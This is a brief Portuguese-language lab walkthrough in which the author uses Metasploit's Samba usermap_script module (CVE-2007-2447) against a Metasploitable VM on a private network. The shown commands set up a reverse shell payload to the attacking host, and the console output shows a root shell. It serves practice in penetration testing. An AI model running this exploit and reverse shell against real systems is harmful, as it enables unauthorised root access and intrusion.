Com uma breve busca na WEB encontrei CVEs atreladas em especial a CVE-2007–2447, que contem métodos de exploração prontos
utilizando o Metasploit dentro do KALI obtive o acesso via remote shell

──(kali㉿kali)-[~]
└─$ msfconsole 

Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1607 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/
# executando o id ainda local no kali
msf6 > id
[*] exec: id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),103(scanner),107(bluetooth),125(lpadmin),133(wireshark),135(kaboxer),136(vboxsf)
msf6 > 
#configurando o exploit 
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf6 exploit(multi/samba/usermap_script) > set RPORT 445
RPORT => 445
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf6 exploit(multi/samba/usermap_script) > set LPORT 4444
LPORT => 4444
#rodando o exploit
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 192.168.56.101:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo V4FLZUwjrDLuCdVG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "V4FLZUwjrDLuCdVG\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.101:4444 -> 192.168.56.102:59516) at 2026-03-19 12:57:15 -0400
#conectou, bora testar

id
uid=0(root) gid=0(root)

hostname
metasploitable

#exploração executada com sucesso!!!
